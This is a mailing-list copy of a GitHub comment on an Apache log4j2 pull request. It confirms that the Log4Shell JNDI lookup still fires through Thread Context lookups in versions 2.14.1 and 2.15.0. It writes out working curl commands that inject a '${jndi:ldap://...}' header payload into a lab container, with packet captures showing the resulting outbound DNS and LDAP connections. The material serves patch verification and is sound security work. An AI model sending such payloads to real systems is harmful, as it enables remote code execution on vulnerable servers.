[GitHub] [logging-log4j2] SpComb edited a comment on pull request #608: Restrict LDAP access via JNDI

Tue, 14 Dec 2021 04:03:18 -0800 


SpComb edited a comment on pull request #608:
URL: https://github.com/apache/logging-log4j2/pull/608#issuecomment-993469509


   > Following up on my question if this fixes usage with other property 
substitutions like ctx: [#608 
(comment)](https://github.com/apache/logging-log4j2/pull/608#issuecomment-992427010)
   > 
   > Apparently I could confirm my assumption regarding the usage of Thread 
Context Map, I created a PR here 
([lunasec-io/lunasec#298](https://github.com/lunasec-io/lunasec/pull/298)) and 
made changes to the demonstration app to demonstrate the vulnerability even 
with `formatMsgNoLookups=true` set shown here: 
https://github.com/kmindi/log4shell-vulnerable-app.
   > 
   > Here is also the diff to see what I changed to demonstrate vulnerable 
`${ctx.apiversion}` usage in the log pattern: 
[kmindi/log4shell-vulnerable-app@e539f7e](https://github.com/kmindi/log4shell-vulnerable-app/commit/e539f7e9a0c81e2c580d63caff5f4eae14033f19)
   > 
   > Can someone confirm this?
   
   Yes: `curl -v 172.17.0.2:8080 -H 'X-Api-Version: 
${jndi:ldap://example.net/test}'` results in a DNS lookup with 2.14.1, whereas 
the attacker-controlled input in the message field does not:
   ```
    41 17.676741911   172.17.0.1 -> 172.17.0.2   HTTP 209 GET / HTTP/1.1 
    42 17.676769664   172.17.0.2 -> 172.17.0.1   TCP 66 8080 > 56934 [ACK] 
Seq=1 Ack=144 Win=30080 Len=0 TSval=346936700 TSecr=2382643118
    43 17.680613689   172.17.0.2 -> 10.52.0.2    DNS 79 Standard query 0xffa9  
A example.net
    44 17.680814368    10.52.0.2 -> 172.17.0.2   DNS 79 Standard query response 
0xffa9 No such name
    45 17.687397342   172.17.0.2 -> 172.17.0.1   HTTP 193 HTTP/1.1 200   
(text/plain)
   ```
   
   The bad news: this seems to also work with 2.15.0, `X-Api-Version: 
${jndi:ldap://localhost/test}` results in a TCP connection to localhost:389:
   
   ```
   $ docker exec -it log4shell-vulnerable-app jar -tvf 
/app/spring-boot-application.jar  | grep log4j
      828 Tue Dec 14 11:55:34 GMT 2021 BOOT-INF/classes/log4j2.properties
    24231 Tue Dec 14 11:55:28 GMT 2021 BOOT-INF/lib/log4j-slf4j-impl-2.15.0.jar
   1789769 Tue Dec 14 11:55:28 GMT 2021 BOOT-INF/lib/log4j-core-2.15.0.jar
    30947 Tue Dec 14 11:55:28 GMT 2021 BOOT-INF/lib/log4j-jul-2.15.0.jar
   301804 Tue Dec 14 11:55:28 GMT 2021 BOOT-INF/lib/log4j-api-2.15.0.jar
   ```
   
   ```
   $ curl -v "$(docker inspect -f '{{.NetworkSettings.IPAddress}}' 
log4shell-vulnerable-app):8080/" -H 'X-Api-Version: 
${jndi:ldap://localhost/test}'
   *   Trying 172.17.0.2:8080...
   * Connected to 172.17.0.2 (172.17.0.2) port 8080 (#0)
   > GET / HTTP/1.1
   > Host: 172.17.0.2:8080
   > User-Agent: curl/7.76.1
   > Accept: */*
   > X-Api-Version: ${jndi:ldap://localhost/test}
   > 
   * Mark bundle as not supporting multiuse
   < HTTP/1.1 200 
   < Content-Type: text/plain;charset=UTF-8
   < Content-Length: 13
   < Date: Tue, 14 Dec 2021 11:57:10 GMT
   < 
   * Connection #0 to host 172.17.0.2 left intact
   Hello, world![
   ```
   
   ```
   $ sudo nsenter -t "$(docker inspect -f '{{.State.Pid}}' 
log4shell-vulnerable-app)" -n tshark -i lo -n
   Running as user "root" and group "root". This could be dangerous.
   Capturing on 'Loopback'
     1 0.000000000    127.0.0.1 -> 127.0.0.1    TCP 74 38380 > 389 [SYN] Seq=0 
Win=43690 Len=0 MSS=65495 SACK_PERM=1 TSval=1022426441 TSecr=0 WS=128
     2 0.000013194    127.0.0.1 -> 127.0.0.1    TCP 54 389 > 38380 [RST, ACK] 
Seq=1 Ack=1 Win=0 Len=0
     3 0.023625945    127.0.0.1 -> 127.0.0.1    TCP 74 38382 > 389 [SYN] Seq=0 
Win=43690 Len=0 MSS=65495 SACK_PERM=1 TSval=1022426464 TSecr=0 WS=128
     4 0.023636425    127.0.0.1 -> 127.0.0.1    TCP 54 389 > 38382 [RST, ACK] 
Seq=1 Ack=1 Win=0 Len=0
     5 0.027652034    127.0.0.1 -> 127.0.0.1    TCP 74 38384 > 389 [SYN] Seq=0 
Win=43690 Len=0 MSS=65495 SACK_PERM=1 TSval=1022426468 TSecr=0 WS=128
     6 0.027662963    127.0.0.1 -> 127.0.0.1    TCP 54 389 > 38384 [RST, ACK] 
Seq=1 Ack=1 Win=0 Len=0
     7 0.042974136    127.0.0.1 -> 127.0.0.1    TCP 74 38386 > 389 [SYN] Seq=0 
Win=43690 Len=0 MSS=65495 SACK_PERM=1 TSval=1022426484 TSecr=0 WS=128
     8 0.042985398    127.0.0.1 -> 127.0.0.1    TCP 54 389 > 38386 [RST, ACK] 
Seq=1 Ack=1 Win=0 Len=0
   ```
   
   This requires a [pattern configured to use `${ctx:...}` 
lookups](https://github.com/kmindi/log4shell-vulnerable-app/blob/e539f7e9a0c81e2c580d63caff5f4eae14033f19/src/main/resources/log4j2.properties#L15-L16
   ) with [attacker-controlled `ThreadContext` 
values](https://github.com/kmindi/log4shell-vulnerable-app/blob/e539f7e9a0c81e2c580d63caff5f4eae14033f19/src/main/java/fr/christophetd/log4shell/vulnerableapp/MainController.java#L20-L22),
 which seem to get expanded recursively.
   
   The 2.15.x JNDI restrictions work correctly (no DNS lookups for 
`example.net`, only `localhost` connections), but the 2.10.x 
`-Dlog4j2.formatMsgNoLookups=true` / 2.15.x 
https://issues.apache.org/jira/browse/LOG4J2-3198 "disable message lookups by 
default" does not seem to apply to `${ctx:...}` lookups.


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: [email protected]

For queries about this service, please contact Infrastructure at:
[email protected]

Reply via email to